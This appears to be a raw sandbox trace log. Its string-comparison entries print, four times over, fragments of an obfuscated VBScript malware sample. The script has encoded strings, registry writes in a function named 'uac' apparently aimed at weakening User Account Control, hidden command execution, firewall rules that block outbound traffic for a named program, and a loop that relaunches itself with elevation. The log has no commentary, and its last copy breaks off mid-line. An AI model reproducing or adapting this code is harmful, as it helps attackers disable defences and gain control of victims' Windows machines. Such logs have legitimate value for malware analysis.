okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0222.992] wcsncmp (_String1="EYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.992] wcsncmp (_String1="YCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.992] wcsncmp (_String1="CRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.992] wcsncmp (_String1="RDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 